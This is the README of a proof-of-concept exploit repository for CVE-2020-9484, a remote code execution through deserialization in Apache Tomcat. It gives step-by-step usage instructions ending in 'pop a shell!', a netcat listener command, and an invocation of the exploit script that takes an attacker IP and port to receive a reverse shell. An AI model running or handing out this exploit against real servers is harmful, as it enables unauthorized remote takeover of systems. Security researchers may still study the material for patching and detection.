POC for CVE-2020-9484

Apache Tomcat RCE by deserialization (CVE-2020-9484)
Explore the docs »

1. Clone this repository, then you will be able to use CVE-2020-9484 and modify the source code if needed.
2. Download ysoserial jar
3. place both CVE-2020-9484 and ysoserial.jar in the same directory
4. pop a shell!

A simple bash script has been written in order to streamline the usage of CVE-2020-9484.
Upon Exploitation you will need to have a netcat listener ready

nc -lvnp $port

./CVE-2020-9484.sh domain attacker-ip attacker-port